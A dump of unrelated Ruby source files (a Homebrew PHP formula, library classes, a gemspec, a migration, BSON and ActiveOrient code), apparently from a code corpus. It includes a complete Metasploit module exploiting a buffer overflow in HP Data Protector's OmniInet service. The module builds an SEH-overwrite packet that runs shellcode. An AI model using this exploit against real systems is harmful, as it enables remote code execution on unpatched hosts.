sha256 "2d601cec4b57cefa451e9bd4892df9c8f406de09c1aaafbf7d3a9a88ab540e67" => :mojave
sha256 "d1383e513d27510e4e8974460756cbef14a59c1fcbcd35c9dbeb6624689ea22f" => :high_sierra
end
keg_only :versioned_formula
deprecate! :date => "2020-11-30"
depends_on "httpd" => [:build, :test]
depends_on "pkg-config" => :build
depends_on "apr"
depends_on "apr-util"
depends_on "argon2"
depends_on "aspell"
depends_on "autoconf"
depends_on "curl-openssl"
depends_on "freetds"
depends_on "freetype"
depends_on "gettext"
depends_on "glib"
depends_on "gmp"
depends_on "icu4c"
depends_on "jpeg"
depends_on "libpng"
depends_on "libpq"
depends_on "libsodium"
depends_on "libzip"
depends_on "openldap"
depends_on "[email protected]"
depends_on "sqlite"
depends_on "tidy-html5"
depends_on "unixodbc"
depends_on "webp"
uses_from_macos "bzip2"
uses_from_macos "libxml2"
uses_from_macos "libxslt"
uses_from_macos "zlib"
# PHP build system incorrectly links system libraries
# see https://github.com/php/php-src/pull/3472
patch :DATA
def install
# Ensure that libxml2 will be detected correctly in older MacOS
ENV["SDKROOT"] = MacOS.sdk_path if MacOS.version == :el_capitan || MacOS.version == :sierra
# buildconf required due to system library linking bug patch
system "./buildconf", "--force"
inreplace "configure" do |s|
s.gsub! "APACHE_THREADED_MPM=`$APXS_HTTPD -V | grep 'threaded:.*yes'`",
"APACHE_THREADED_MPM="
s.gsub! "APXS_LIBEXECDIR='$(INSTALL_ROOT)'`$APXS -q LIBEXECDIR`",
"APXS_LIBEXECDIR='$(INSTALL_ROOT)#{lib}/httpd/modules'"
s.gsub! "-z `$APXS -q SYSCONFDIR`",
"-z ''"
# apxs will interpolate the @ in the versioned prefix: https://bz.apache.org/bugzilla/show_bug.cgi?id=61944
s.gsub! "LIBEXECDIR='$APXS_LIBEXECDIR'",
"LIBEXECDIR='" + "#{lib}/httpd/modules".gsub("@", "\\@") + "'"
end
# Update error message in apache sapi to better explain the requirements
# of using Apache http in combination with php if the non-compatible MPM
# has been selected. Homebrew has chosen not to support being able to
# compile a thread safe version of PHP and therefore it is not
# possible to recompile as suggested in the original message
inreplace "sapi/apache2handler/sapi_apache2.c",
"You need to recompile PHP.",
"Homebrew PHP does not support a thread-safe php binary. "\
"To use the PHP apache sapi please change "\
"your httpd config to use the prefork MPM"
inreplace "sapi/fpm/php-fpm.conf.in", ";daemonize = yes", "daemonize = no"
# Required due to icu4c dependency
ENV.cxx11
config_path = etc/"php/#{php_version}"
# Prevent system pear config from inhibiting pear install
(config_path/"pear.conf").delete if (config_path/"pear.conf").exist?
# Prevent homebrew from harcoding path to sed shim in phpize script
ENV["lt_cv_path_SED"] = "sed"
# Each extension that is built on Mojave needs a direct reference to the
# sdk path or it won't find the headers
headers_path = "=#{MacOS.sdk_path_if_needed}/usr"
args = %W[
--prefix=#{prefix}
--localstatedir=#{var}
--sysconfdir=#{config_path}
--with-config-file-path=#{config_path}
--with-config-file-scan-dir=#{config_path}/conf.d
--with-pear=#{pkgshare}/pear
--enable-bcmath
--enable-calendar
--enable-dba
--enable-dtrace
--enable-exif
--enable-ftp
--enable-fpm
--enable-intl
--enable-mbregex
--enable-mbstring
--enable-mysqlnd
--enable-opcache-file
--enable-pcntl
--enable-phpdbg
--enable-phpdbg-readline
--enable-phpdbg-webhelper
--enable-shmop
--enable-soap
--enable-sockets
--enable-sysvmsg
--enable-sysvsem
--enable-sysvshm
--enable-wddx
--enable-zip
--with-apxs2=#{Formula["httpd"].opt_bin}/apxs
--with-bz2#{headers_path}
--with-curl=#{Formula["curl-openssl"].opt_prefix}
--with-fpm-user=_www
--with-fpm-group=_www
--with-freetype-dir=#{Formula["freetype"].opt_prefix}
--with-gd
--with-gettext=#{Formula["gettext"].opt_prefix}
--with-gmp=#{Formula["gmp"].opt_prefix}
--with-iconv#{headers_path}
--with-icu-dir=#{Formula["icu4c"].opt_prefix}
--with-jpeg-dir=#{Formula["jpeg"].opt_prefix}
--with-kerberos#{headers_path}
--with-layout=GNU
--with-ldap=#{Formula["openldap"].opt_prefix}
--with-ldap-sasl#{headers_path}
--with-libxml-dir#{headers_path}
--with-libedit#{headers_path}
--with-libzip
--with-mhash#{headers_path}
--with-mysql-sock=/tmp/mysql.sock
--with-mysqli=mysqlnd
--with-ndbm#{headers_path}
--with-openssl=#{Formula["[email protected]"].opt_prefix}
--with-password-argon2=#{Formula["argon2"].opt_prefix}
--with-pdo-dblib=#{Formula["freetds"].opt_prefix}
--with-pdo-mysql=mysqlnd
--with-pdo-odbc=unixODBC,#{Formula["unixodbc"].opt_prefix}
--with-pdo-pgsql=#{Formula["libpq"].opt_prefix}
--with-pdo-sqlite=#{Formula["sqlite"].opt_prefix}
--with-pgsql=#{Formula["libpq"].opt_prefix}
--with-pic
--with-png-dir=#{Formula["libpng"].opt_prefix}
--with-pspell=#{Formula["aspell"].opt_prefix}
--with-sodium=#{Formula["libsodium"].opt_prefix}
--with-sqlite3=#{Formula["sqlite"].opt_prefix}
--with-tidy=#{Formula["tidy-html5"].opt_prefix}
--with-unixODBC=#{Formula["unixodbc"].opt_prefix}
--with-webp-dir=#{Formula["webp"].opt_prefix}
--with-xmlrpc
--with-xsl#{headers_path}
--with-zlib#{headers_path}
]
system "./configure", *args
system "make"
system "make", "install"
# Allow pecl to install outside of Cellar
extension_dir = Utils.safe_popen_read("#{bin}/php-config --extension-dir").chomp
orig_ext_dir = File.basename(extension_dir)
inreplace bin/"php-config", lib/"php", prefix/"pecl"
inreplace "php.ini-development", %r{; ?extension_dir = "\./"},
"extension_dir = \"#{HOMEBREW_PREFIX}/lib/php/pecl/#{orig_ext_dir}\""
# Use OpenSSL cert bundle
openssl = Formula["[email protected]"]
inreplace "php.ini-development", /; ?openssl\.cafile=/,
"openssl.cafile = \"#{openssl.pkgetc}/cert.pem\""
inreplace "php.ini-development", /; ?openssl\.capath=/,
"openssl.capath = \"#{openssl.pkgetc}/certs\""
config_files = {
"php.ini-development" => "php.ini",
"sapi/fpm/php-fpm.conf" => "php-fpm.conf",
"sapi/fpm/www.conf" => "php-fpm.d/www.conf",
}
config_files.each_value do |dst|
dst_default = config_path/"#{dst}.default"
rm dst_default if dst_default.exist?
end
config_path.install config_files
unless (var/"log/php-fpm.log").exist?
(var/"log").mkpath
touch var/"log/php-fpm.log"
end
end
def post_install
pear_prefix = pkgshare/"pear"
pear_files = %W[
#{pear_prefix}/.depdblock
#{pear_prefix}/.filemap
#{pear_prefix}/.depdb
#{pear_prefix}/.lock
]
%W[
#{pear_prefix}/.channels
#{pear_prefix}/.channels/.alias
].each do |f|
chmod 0755, f
pear_files.concat(Dir["#{f}/*"])
end
chmod 0644, pear_files
# Custom location for extensions installed via pecl
pecl_path = HOMEBREW_PREFIX/"lib/php/pecl"
ln_s pecl_path, prefix/"pecl" unless (prefix/"pecl").exist?
extension_dir = Utils.safe_popen_read("#{bin}/php-config --extension-dir").chomp
php_basename = File.basename(extension_dir)
php_ext_dir = opt_prefix/"lib/php"/php_basename
# fix pear config to install outside cellar
pear_path = HOMEBREW_PREFIX/"share/pear@#{php_version}"
cp_r pkgshare/"pear/.", pear_path
{
"php_ini" => etc/"php/#{php_version}/php.ini",
"php_dir" => pear_path,
"doc_dir" => pear_path/"doc",
"ext_dir" => pecl_path/php_basename,
"bin_dir" => opt_bin,
"data_dir" => pear_path/"data",
"cfg_dir" => pear_path/"cfg",
"www_dir" => pear_path/"htdocs",
"man_dir" => HOMEBREW_PREFIX/"share/man",
"test_dir" => pear_path/"test",
"php_bin" => opt_bin/"php",
}.each do |key, value|
value.mkpath if /(?<!bin|man)_dir$/.match?(key)
system bin/"pear", "config-set", key, value, "system"
end
system bin/"pear", "update-channels"
%w[
opcache
].each do |e|
ext_config_path = etc/"php/#{php_version}/conf.d/ext-#{e}.ini"
extension_type = (e == "opcache") ? "zend_extension" : "extension"
if ext_config_path.exist?
inreplace ext_config_path,
/#{extension_type}=.*$/, "#{extension_type}=#{php_ext_dir}/#{e}.so"
else
ext_config_path.write <<~EOS
[#{e}]
#{extension_type}="#{php_ext_dir}/#{e}.so"
EOS
end
end
end
def caveats
<<~EOS
To enable PHP in Apache add the following to httpd.conf and restart Apache:
LoadModule php7_module #{opt_lib}/httpd/modules/libphp7.so
<FilesMatch \\.php$>
SetHandler application/x-httpd-php
</FilesMatch>
Finally, check DirectoryIndex includes index.php
DirectoryIndex index.php index.html
The php.ini and php-fpm.ini file can be found in:
#{etc}/php/#{php_version}/
EOS
end
def php_version
version.to_s.split(".")[0..1].join(".")
end
plist_options :manual => "php-fpm"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>KeepAlive</key>
<true/>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>#{opt_sbin}/php-fpm</string>
<string>--nodaemonize</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>WorkingDirectory</key>
<string>#{var}</string>
<key>StandardErrorPath</key>
<string>#{var}/log/php-fpm.log</string>
</dict>
</plist>
EOS
end
test do
assert_match /^Zend OPcache$/, shell_output("#{bin}/php -i"),
"Zend OPCache extension not loaded"
# Test related to libxml2 and
# https://github.com/Homebrew/homebrew-core/issues/28398
assert_includes MachO::Tools.dylibs("#{bin}/php"),
"#{Formula["libpq"].opt_lib}/libpq.5.dylib"
system "#{sbin}/php-fpm", "-t"
system "#{bin}/phpdbg", "-V"
system "#{bin}/php-cgi", "-m"
# Prevent SNMP extension to be added
assert_no_match /^snmp$/, shell_output("#{bin}/php -m"),
"SNMP extension doesn't work reliably with Homebrew on High Sierra"
begin
port = free_port
port_fpm = free_port
expected_output = /^Hello world!$/
(testpath/"index.php").write <<~EOS
<?php
echo 'Hello world!' . PHP_EOL;
var_dump(ldap_connect());
EOS
main_config = <<~EOS
Listen #{port}
ServerName localhost:#{port}
DocumentRoot "#{testpath}"
ErrorLog "#{testpath}/httpd-error.log"
ServerRoot "#{Formula["httpd"].opt_prefix}"
PidFile "#{testpath}/httpd.pid"
LoadModule authz_core_module lib/httpd/modules/mod_authz_core.so
LoadModule unixd_module lib/httpd/modules/mod_unixd.so
LoadModule dir_module lib/httpd/modules/mod_dir.so
DirectoryIndex index.php
EOS
(testpath/"httpd.conf").write <<~EOS
#{main_config}
LoadModule mpm_prefork_module lib/httpd/modules/mod_mpm_prefork.so
LoadModule php7_module #{lib}/httpd/modules/libphp7.so
<FilesMatch \\.(php|phar)$>
SetHandler application/x-httpd-php
</FilesMatch>
EOS
(testpath/"fpm.conf").write <<~EOS
[global]
daemonize=no
[www]
listen = 127.0.0.1:#{port_fpm}
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3
EOS
(testpath/"httpd-fpm.conf").write <<~EOS
#{main_config}
LoadModule mpm_event_module lib/httpd/modules/mod_mpm_event.so
LoadModule proxy_module lib/httpd/modules/mod_proxy.so
LoadModule proxy_fcgi_module lib/httpd/modules/mod_proxy_fcgi.so
<FilesMatch \\.(php|phar)$>
SetHandler "proxy:fcgi://127.0.0.1:#{port_fpm}"
</FilesMatch>
EOS
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
Process.kill("TERM", pid)
Process.wait(pid)
fpm_pid = fork do
exec sbin/"php-fpm", "-y", "fpm.conf"
end
pid = fork do
exec Formula["httpd"].opt_bin/"httpd", "-X", "-f", "#{testpath}/httpd-fpm.conf"
end
sleep 3
assert_match expected_output, shell_output("curl -s 127.0.0.1:#{port}")
ensure
if pid
Process.kill("TERM", pid)
Process.wait(pid)
end
if fpm_pid
Process.kill("TERM", fpm_pid)
Process.wait(fpm_pid)
end
end
end
end
__END__
diff --git a/acinclude.m4 b/acinclude.m4
index 168c465f8d..6c087d152f 100644
--- a/acinclude.m4
+++ b/acinclude.m4
@@ -441,7 +441,11 @@ dnl
dnl Adds a path to linkpath/runpath (LDFLAGS)
dnl
AC_DEFUN([PHP_ADD_LIBPATH],[
- if test "$1" != "/usr/$PHP_LIBDIR" && test "$1" != "/usr/lib"; then
+ case "$1" in
+ "/usr/$PHP_LIBDIR"|"/usr/lib"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/lib[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/lib[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
ifelse([$2],,[
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
@@ -452,8 +456,8 @@ AC_DEFUN([PHP_ADD_LIBPATH],[
else
_PHP_ADD_LIBPATH_GLOBAL([$ai_p])
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl
@@ -487,7 +491,11 @@ dnl add an include path.
dnl if before is 1, add in the beginning of INCLUDES.
dnl
AC_DEFUN([PHP_ADD_INCLUDE],[
- if test "$1" != "/usr/include"; then
+ case "$1" in
+ "/usr/include"[)] ;;
+ /Library/Developer/CommandLineTools/SDKs/*/usr/include[)] ;;
+ /Applications/Xcode*.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/*/usr/include[)] ;;
+ *[)]
PHP_EXPAND_PATH($1, ai_p)
PHP_RUN_ONCE(INCLUDEPATH, $ai_p, [
if test "$2"; then
@@ -495,8 +503,8 @@ AC_DEFUN([PHP_ADD_INCLUDE],[
else
INCLUDES="$INCLUDES -I$ai_p"
fi
- ])
- fi
+ ]) ;;
+ esac
])
dnl internal, don't use
@@ -2411,7 +2419,8 @@ AC_DEFUN([PHP_SETUP_ICONV], [
fi
if test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.a ||
- test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.$SHLIB_SUFFIX_NAME ||
+ test -f $ICONV_DIR/$PHP_LIBDIR/lib$iconv_lib_name.tbd
then
PHP_CHECK_LIBRARY($iconv_lib_name, libiconv, [
found_iconv=yes
| 32.520492 | 113 | 0.624575 |
26fc7da8d9d8ff0269ab4cc09584a5fff2115560 | 4,979 | # encoding: UTF-8
#
# Copyright (c) 2010-2015 GoodData Corporation. All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
require_relative '../rest/resource'
require_relative '../mixins/data_property_reader'
require_relative '../mixins/links'
require_relative '../mixins/rest_resource'
require_relative '../mixins/uri_getter'
module GoodData
class Client < Rest::Resource
data_property_reader 'id'
attr_accessor :domain
include Mixin::Links
include Mixin::UriGetter
CLIENT_TEMPLATE = {
client: {
id: nil,
segment: nil,
project: nil
}
}
class << self
def [](id, opts = {})
domain = opts[:domain]
segment = opts[:segment]
fail ArgumentError, 'No :domain specified' if domain.nil?
fail ArgumentError, 'No :segment specified' if domain.nil?
client = domain.client
fail ArgumentError, 'No client specified' if client.nil?
base_uri = domain.segments_uri + "/clients?segment=#{CGI.escape(segment.segment_id)}"
tenants_uri = id == :all ? base_uri : base_uri + "&name=#{CGI.escape(id)}"
e = Enumerator.new do |y|
loop do
res = client.get tenants_uri
res['clients']['paging']['next']
res['clients']['items'].each do |i|
p = i['client']['project']
tenant = client.create(GoodData::Client, i.merge('domain' => domain))
tenant.project = p
y << tenant
end
url = res['clients']['paging']['next']
break unless url
end
end
id == :all ? e : e.first
end
# Creates new client from parameters passed
#
# @param options [Hash] Optional options
# @return [GoodData::Schedule] New GoodData::Schedule instance
def create(data = {}, options = {})
segment = options[:segment]
domain = segment.domain
tenant = client.create(GoodData::Client, GoodData::Helpers.deep_stringify_keys(CLIENT_TEMPLATE.merge(domain: domain)), domain: domain)
tenant.tap do |s|
s.project = data[:project]
s.client_id = data[:id]
s.segment = segment.uri
end
end
end
def initialize(data)
super(data)
@domain = data.delete('domain')
@json = data
end
# Segment id getter for the Segment. Called segment_id since id is a reserved word in ruby world
#
# @return [String] Segment id
def client_id
data['id']
end
def client_id=(a_name)
data['id'] = a_name
self
end
# Setter for the project this client has set
#
# @param a_project [String|GoodData::Project] Id or an instance of a project
# @return [GoodData::Cliet] Returns the instance of the client
def project=(a_project)
data['project'] = a_project.respond_to?(:uri) ? a_project.uri : a_project
self
end
# Project URI this client has set
#
# @return [String] Returns the URI of the project this client has set
def project_uri
data['project']
end
# Project this client has set
#
# @return [GoodData::Project] Returns the instance of the client's project
def project
client.projects(project_uri) if project?
end
# Returns boolean if client has a project provisioned
#
# @return [Boolean] Returns true if client has a project provisioned. False otherwise
def project?
project_uri != nil
end
# Reloads the client from the URI
#
# @return [GoodData::Client] Returns the updated client object
def reload!
res = client.get(uri)
@json = res
self
end
# Segment id setter which this client is connected to.
#
# @param a_segment [String] Id of the segment.
# @return [GoodData::Client] Returns the instance of the client
def segment=(a_segment)
data['segment'] = a_segment.respond_to?(:uri) ? a_segment.uri : a_segment
self
end
# Segment this client is connected to.
#
# @return [GoodData::Segment] Segment
def segment
segment_res = client.get(data['segment'])
client.create(GoodData::Segment, segment_res)
end
# Segment URI this client is connected to.
#
# @return [String] Segment URI
def segment_uri
data['segment']
end
# Creates or updates a client instance on the API.
#
# @return [GoodData::Client] Client instance
def save
if uri
client.put(uri, json)
else
res = client.post(domain.segments_uri + '/clients', json)
@json = res
end
self
end
# Deletes a client instance on the API.
#
# @return [GoodData::Client] Segment instance
def delete
project.delete if project && !project.deleted?
client.delete(uri) if uri
end
end
end
| 27.815642 | 142 | 0.615385 |
f73eb9a1a2b3f842ef1a037ba665698c97aad5ef | 692 | FactoryGirl.define do
factory :restaurant_partial, class: "Restaurant" do
active true
status :new_account #AccountStatus::NewAccount.new.text # AccountStatuses::NewAccount
brief "is a newly signed up account. They say it gets busy. Let us know how it goes!"
unedited true
after(:build) do |f|
f.mini_contact = FactoryGirl.build(:mini_contact, :with_restaurant, restaurant: f)
f.location = FactoryGirl.build(:location, :with_locatable, locatable: f)
f.managers = [ FactoryGirl.build(:manager, :with_restaurant, restaurants: [ f ]) ]
f.rider_payment_info = FactoryGirl.build(:rider_payment_info, :with_restaurant, restaurant: f)
end
end
end
| 43.25 | 100 | 0.725434 |
79b53e27ae3c4e0768efd9f3f2e5ec1562fab02b | 1,581 | # -*- ruby -*-
# encoding: utf-8
require File.expand_path("lib/google/cloud/os_login/v1/version", __dir__)
Gem::Specification.new do |gem|
gem.name = "google-cloud-os_login-v1"
gem.version = Google::Cloud::OsLogin::V1::VERSION
gem.authors = ["Google LLC"]
gem.email = "[email protected]"
gem.description = "Use OS Login to manage SSH access to your instances using IAM without having to create and manage individual SSH keys. OS Login maintains a consistent Linux user identity across VM instances and is the recommended way to manage many users across multiple instances or projects."
gem.summary = "API Client library for the Cloud OS Login V1 API"
gem.homepage = "https://github.com/googleapis/google-cloud-ruby"
gem.license = "Apache-2.0"
gem.platform = Gem::Platform::RUBY
gem.files = `git ls-files -- lib/*`.split("\n") +
`git ls-files -- proto_docs/*`.split("\n") +
["README.md", "LICENSE.md", "AUTHENTICATION.md", ".yardopts"]
gem.require_paths = ["lib"]
gem.required_ruby_version = ">= 2.4"
gem.add_dependency "gapic-common", "~> 0.2"
gem.add_dependency "google-cloud-errors", "~> 1.0"
gem.add_development_dependency "google-style", "~> 1.24.0"
gem.add_development_dependency "minitest", "~> 5.10"
gem.add_development_dependency "rake", ">= 12.0"
gem.add_development_dependency "redcarpet", "~> 3.0"
gem.add_development_dependency "simplecov", "~> 0.18"
gem.add_development_dependency "yard", "~> 0.9"
end
| 43.916667 | 301 | 0.664137 |
f8aeca8a7231cf7d10f767a39a36d7bfa3b8ff7e | 3,461 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Hewlett-Packard
OmniInet NT Service. By sending a specially crafted opcode 27 packet,
a remote attacker may be able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2011-1865' ],
[ 'OSVDB', '73571'],
[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243',
{
#POP/POP/RET from OmniBack\bin\MSVCR71.dll
'Ret' => 0x7c35630d
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2011'))
register_options([Opt::RPORT(5555)], self.class)
end
def check
connect
sock.put(rand_text_alpha_upper(64))
resp = sock.get_once(-1,5)
disconnect
if (resp)
resp = resp.unpack('v*').pack('C*')
print_status("Received response: " + resp)
# extract version
if (resp =~ /HP Data Protector/)
version = resp.split[3]
elsif (resp =~ /HP OpenView Storage Data Protector/)
version = resp.split[5]
elsif (resp =~ /HP StorageWorks Application Recovery Manager/)
version = resp.split[5]
else
return Exploit::CheckCode::Detected
end
version = version.split('.')
major = version[1].to_i
minor = version[2].to_i
if ((major < 6) or (major == 6 and minor < 11))
return Exploit::CheckCode::Appears
end
if ((major > 6) or (major == 6 and minor >= 11))
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Safe
end
def exploit
connect
trigger = rand_text_alpha_upper(10000)
trigger[4552, payload.encoded.length] = payload.encoded
trigger[5352, 8] = generate_seh_record(target.ret)
trigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-788").encode_string
opcode = "27"
packet = Rex::Text.to_unicode("\x00")
packet << "\x27\xca" #length
packet << "\xff\xfe\x32"
packet << "\x00\x00\x00"
packet << Rex::Text.to_unicode("\x20\x61\x00") * 3
packet << Rex::Text.to_unicode("\x20")
packet << trigger
packet << Rex::Text.to_unicode("\x00")
packet << Rex::Text.to_unicode("\x20\x61\x00")
packet << Rex::Text.to_unicode("\x20" + opcode + "\x00")
packet << Rex::Text.to_unicode("\x20\x61\x00") * 24
print_status("Trying #{target.name}...")
sock.put(packet)
select(nil,nil,nil,10)
handler
disconnect
end
end
| 27.039063 | 102 | 0.56631 |
1dd6dd5d3f4dd8911c623499421992b8ce04d7ab | 241 | class AddActivateionToUsers < ActiveRecord::Migration[5.1]
def change
add_column :users, :activation_digest, :string
add_column :users, :activated, :boolean, default: false
add_column :users, :activated_at, :datetime
end
end
| 30.125 | 59 | 0.746888 |
014a5d30df4fdcf034492bd99092b4ed580a16bb | 68 | class DealershipVehiclesController < ApplicationController
end
| 17 | 58 | 0.838235 |
ffd67bbc64023dbf6f33f485b74d1b3fc551fa16 | 315 | # Needed to import datamapper and other gems
require 'rubygems'
require 'pathname'
# Add all external dependencies for the plugin here
gem 'dm-core', '0.10.0'
require 'dm-core'
dir = Pathname(__FILE__).dirname.expand_path / 'dm-querizer'
require dir / 'querizer'
require dir / 'model'
require dir / 'collection'
| 22.5 | 60 | 0.742857 |
21f10bb5bdeea3da28091a929f098808bb41baf8 | 1,566 | # ActsAsSlugged
#
# This module automatically generates slugs based on the :to_s field using a before_validation filter
#
# Mark your model with 'acts_as_sluggable' make sure you have a string field :slug
module ActsAsSlugged
extend ActiveSupport::Concern
module ActiveRecord
def acts_as_slugged(options = nil)
include ::ActsAsSlugged
end
end
included do
extend FinderMethods
before_validation { self.slug ||= build_slug }
validates :slug,
presence: true, uniqueness: true, exclusion: { in: excluded_slugs }, length: { maximum: 255 },
format: { with: /\A[a-zA-Z0-9_-]*\z/, message: 'only _ and - symbols allowed. no spaces either.' }
end
module ClassMethods
def relation
super.tap { |relation| relation.extend(FinderMethods) }
end
def excluded_slugs
::ActiveRecord::Base.connection.tables.map { |x| x }.compact
end
end
module FinderMethods
def find(*args)
return super unless args.length == 1
return super if block_given?
where(slug: args.first).or(where(id: args.first)).first || raise(::ActiveRecord::RecordNotFound.new("Couldn't find #{name} with 'slug'=#{args.first}"))
end
end
# Instance Methods
def build_slug
slug = self.to_s.parameterize.downcase[0, 250]
if self.class.excluded_slugs.include?(slug)
slug = "#{slug}-#{self.class.name.demodulize.parameterize}"
end
if (count = self.class.where(slug: slug).count) > 0
slug = "#{slug}-#{count+1}"
end
slug
end
def to_param
slug
end
end
| 23.727273 | 157 | 0.671775 |
335fb757c2039b4a66e29cdfd161175f18cb639d | 1,514 | # frozen_string_literal: true
# Allows reviewers to specify agreement variables for resubmission.
class Reviewer::AgreementVariablesController < ApplicationController
before_action :authenticate_user!
before_action :find_editable_data_request_or_redirect
before_action :find_agreement_variable_or_redirect, only: [:edit, :update]
def update
if @agreement_variable.update(agreement_variable_params)
respond_to do |format|
format.html do
redirect_to review_path(@data_request), notice: "Agreement variable was successfully updated."
end
format.js { render :show }
end
else
render :edit
end
end
private
def find_editable_data_request_or_redirect
@data_request = current_user.review_editors_data_requests
.where(status: "submitted")
.find_by(id: params[:data_request_id])
empty_response_or_root_path(reviews_path) unless @data_request
end
def find_agreement_variable_or_redirect
@agreement_variable = @data_request.agreement_variables.find_by(id: params[:id])
empty_response_or_root_path(review_path(@data_request)) unless @agreement_variable
end
def agreement_variable_params
params[:agreement_variable] ||= { blank: "1" }
params[:agreement_variable][:resubmission_required] = params.dig(:agreement_variable, :reviewer_comment).present?
params.require(:agreement_variable).permit(:reviewer_comment, :resubmission_required)
end
end
| 36.047619 | 117 | 0.742404 |
91ca08a9ceb6926fd992617d82f1e38d92f7990f | 259 | class CreatePicture < ActiveRecord::Migration
def change
create_table :pictures do |t|
t.timestamps
t.string :name, null: false
t.text :description
t.datetime :date
t.integer :monument_id, null: false
end
end
end
| 21.583333 | 45 | 0.648649 |
33eb747d7f8da7e3767bd3ac03ef3c3ca5d25039 | 2,783 | # Copyright (C) 2009-2019 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "bson/environment"
# The core namespace for all BSON related behaviour.
#
# @since 0.0.0
module BSON
# Create a new object id from a string using ObjectId.from_string
#
# @example Create an object id from the string.
# BSON::ObjectId(id)
#
# @param [ String ] string The string to create the id from.
#
# @raise [ BSON::ObjectId::Invalid ] If the provided string is invalid.
#
# @return [ BSON::ObjectId ] The new object id.
#
# @see ObjectId.from_string
def self.ObjectId(string)
self::ObjectId.from_string(string)
end
# Constant for binary string encoding.
#
# @since 2.0.0
BINARY = "BINARY".freeze
# Constant for bson types that don't actually serialize a value.
#
# @since 2.0.0
NO_VALUE = "".force_encoding(BINARY).freeze
# Constant for a null byte (0x00).
#
# @since 2.0.0
NULL_BYTE = 0.chr.force_encoding(BINARY).freeze
# Constant for UTF-8 string encoding.
#
# @since 2.0.0
UTF8 = "UTF-8".freeze
end
require "bson/config"
require "bson/registry"
require "bson/specialized"
require "bson/json"
require "bson/int32"
require "bson/int64"
require "bson/integer"
require "bson/array"
require "bson/binary"
require "bson/boolean"
require "bson/code"
require "bson/code_with_scope"
require "bson/date"
require "bson/date_time"
require "bson/decimal128"
require "bson/document"
require "bson/ext_json"
require "bson/false_class"
require "bson/float"
require "bson/hash"
require "bson/open_struct"
require "bson/max_key"
require "bson/min_key"
require "bson/nil_class"
require "bson/object"
require "bson/object_id"
require "bson/regexp"
require "bson/string"
require "bson/symbol"
require "bson/time"
require "bson/timestamp"
require "bson/true_class"
require "bson/undefined"
require "bson/version"
# If we are using JRuby, attempt to load the Java extensions, if we are using
# MRI or Rubinius, attempt to load the C extensions.
#
# @since 2.0.0
begin
if BSON::Environment.jruby?
require "bson-ruby.jar"
org.bson.NativeService.new.basicLoad(JRuby.runtime)
else
require "bson_native"
end
rescue LoadError => e
$stderr.puts("Failed to load the necessary extensions: #{e.class}: #{e}")
raise
end
| 25.53211 | 77 | 0.727273 |
01dfc4ea893bb8a83108bf73f6e291e3293d6b80 | 19,980 | module ModelClass
require 'stringio'
include OrientSupport::Support
########### CLASS FUNCTIONS ######### SELF ####
######## INITIALIZE A RECORD FROM A CLASS ########
=begin
NamingConvention provides a translation from database-names to class-names.
It can be overwritten to provide different conventions for different classes, eg. Vertexes or edges
and to introduce distinct naming-conventions in different namespaces
To overwrite use
class Model # < ActiveOrient::Model[:: ...]
def self.naming_convention
( conversion code )
end
end
=end
def naming_convention name=nil
nc = name.present?? name.to_s : ref_name
if namespace_prefix.present?
nc.split(namespace_prefix).last.camelize
else
nc.camelize
end
rescue
nil
end
=begin
Set the namespace_prefix for database-classes.
If a namespace is set by
ActiveOrient::Init.define_namespace { ModuleName }
ActiveOrient translates this to
ModuleName::CamelizedClassName
The database-class becomes
modulename_class_name
If the namespace is set to a class (Object, ActiveOrient::Model ) namespace_prefix returns an empty string.
Override to change its behavior
=end
def namespace_prefix
namespace.is_a?(Class )? '' : namespace.to_s.downcase+'_'
end
=begin
orientdb_class is used to refer a ActiveOrient:Model-Object providing its name
Parameter: name: string or symbol
=end
